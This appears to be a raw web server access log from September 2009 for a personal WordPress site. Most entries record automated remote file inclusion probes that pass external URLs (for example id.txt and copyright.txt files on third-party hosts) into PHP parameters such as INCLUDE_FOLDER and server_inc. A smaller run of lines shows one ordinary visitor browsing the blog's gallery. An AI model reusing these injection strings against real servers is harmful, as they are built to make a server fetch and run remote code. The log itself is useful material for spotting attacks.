92.50.143.90 - - [07/Sep/2009:10:37:46 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:47 -0700] "GET /logs/access_090311.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:47 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:47 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:10:37:50 -0700] "GET /logs/access_090311.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:10:37:50 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:10:37:50 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:10:37:50 -0700] "GET /logs/access_090311.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:10:37:51 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:51 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:51 -0700] "GET /logs/access_090311.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:51 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:51 -0700] "GET /logs/access_090311.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:51 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:37:51 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:37:51 -0700] "GET /logs/access_090617.log%20%20//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:37:51 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:37:51 -0700] "GET /logs/access_090709.log%20%20//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:37:51 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:37:51 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:37:51 -0700] "GET /logs/access_090617.log%20%20//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:37:51 -0700] "GET /logs/access_090709.log%20%20//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:52 -0700] "GET /logs/access_090219.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:52 -0700] "GET /logs/access_090219.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:54 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:10:37:56 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:56 -0700] "GET /logs/access_090219.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:10:37:57 -0700] "GET /logs/access_090219.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:10:37:58 -0700] "GET /logs/access_090219.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:10:37:59 -0700] "GET /logs/access_090219.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.84.44 - - [07/Sep/2009:10:38:05 -0700] "GET /logs/access_090722.log///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:38:06 -0700] "GET /logs/access_090617.log//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:38:06 -0700] "GET /logs/access_090709.log//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:38:06 -0700] "GET /logs/access_090617.log//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:38:06 -0700] "GET /logs/access_090709.log//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:38:35 -0700] "GET /logs/access_090724.log/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:38:35 -0700] "GET /logs/access_080828.log/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:38:35 -0700] "GET /logs/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:38:35 -0700] "GET /avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:38:42 -0700] "GET /logs/access_080501.log%20%20/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:38:42 -0700] "GET /logs/access_090724.log%20%20/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:39:12 -0700] "GET /avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:39:12 -0700] "GET /logs/access_090724.log/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:39:12 -0700] "GET /logs/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:39:13 -0700] "GET /logs/access_080828.log/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:39:17 -0700] "GET /logs/access_080501.log%20%20/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:39:17 -0700] "GET /logs/access_090724.log%20%20/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:39:30 -0700] "GET /logs/access_081129.log//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.118.116.55 - - [07/Sep/2009:10:39:35 -0700] "GET /common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.118.116.55 - - [07/Sep/2009:10:39:35 -0700] "GET /logs//common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.118.116.55 - - [07/Sep/2009:10:39:35 -0700] "GET /logs/access_080928.log//common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.188.164 - - [07/Sep/2009:10:39:42 -0700] "GET /logs/access_081129.log//inc/header.php/step_one.php?server_inc=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:10:39:42 -0700] "GET /logs/access_080501.log/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:51 -0700] "GET / HTTP/1.1" 200 19833 "http://www.st-owners.com/forums/showthread.php?t=62758&page=2" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "www.dmulk.com"
87.118.116.55 - - [07/Sep/2009:10:39:51 -0700] "GET /logs/access_081108.log//common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.1" 200 10083 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.1" 200 5715 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-includes/js/swfobject.js?ver=2.1 HTTP/1.1" 200 9759 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1" 200 57276 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1" 200 3864 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/wp-content/themes/defaultwide/defaultwide/style.css" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_003.jpg HTTP/1.1" 200 555088 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_002.jpg HTTP/1.1" 200 601843 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_001.jpg HTTP/1.1" 200 611206 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_005.jpg HTTP/1.1" 200 620247 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_042.jpg HTTP/1.1" 200 669364 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:52 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1-20090123 HTTP/1.1" 200 12100 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_013.jpg HTTP/1.1" 200 509456 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_012.jpg HTTP/1.1" 200 517793 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_007.jpg HTTP/1.1" 200 596976 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_014.jpg HTTP/1.1" 200 656470 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_015.jpg HTTP/1.1" 200 536939 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_016.jpg HTTP/1.1" 200 449792 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-content/uploads/imagerotator.swf HTTP/1.1" 200 42753 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_020.jpg HTTP/1.1" 200 628243 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_021.jpg HTTP/1.1" 200 621789 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:54 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_008.jpg HTTP/1.1" 200 816060 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:54 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_023.jpg HTTP/1.1" 200 724029 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_040.jpg HTTP/1.1" 200 522506 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:56 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/imagerotator.php?gid=18&456 HTTP/1.1" 200 8715 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:56 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/imagerotator.php?gid=0&611 HTTP/1.1" 200 270073 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:39:56 -0700] "GET /logs/access_090724.log/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:39:56 -0700] "GET /logs/access_080828.log/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:39:56 -0700] "GET /avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:39:56 -0700] "GET /logs/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_046.jpg HTTP/1.1" 200 620341 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:57 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_044.jpg HTTP/1.1" 200 780358 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:57 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_043.jpg HTTP/1.1" 200 705590 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:57 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/011.jpg HTTP/1.1" 200 298183 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:57 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_053.jpg HTTP/1.1" 200 642316 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:57 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_054.jpg HTTP/1.1" 200 765025 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:57 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_056.jpg HTTP/1.1" 200 694527 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:58 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_030.jpg HTTP/1.1" 200 890330 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:58 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_067.jpg HTTP/1.1" 200 651731 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:58 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_066.jpg HTTP/1.1" 200 523240 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:59 -0700] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickbgwide.jpg HTTP/1.1" 200 885 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:59 -0700] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickheader.jpg HTTP/1.1" 200 10076 "http://dmulk.com/blog/wp-content/themes/defaultwide/defaultwide/style.css" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:59 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-047_2.jpg HTTP/1.1" 200 361330 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:59 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_049.jpg HTTP/1.1" 200 917099 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:59 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/thumbs/thumbs_059.jpg HTTP/1.1" 200 796281 "http://www.dmulk.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:39:59 -0700] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickfooter.jpg HTTP/1.1" 200 2683 "http://dmulk.com/blog/wp-content/themes/defaultwide/defaultwide/style.css" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:40:00 -0700] "GET /logs/access_090724.log%20%20/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.25.236.152 - - [07/Sep/2009:10:40:00 -0700] "GET /logs/access_080501.log%20%20/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:40:03 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "www.dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:40:04 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "www.dmulk.com"
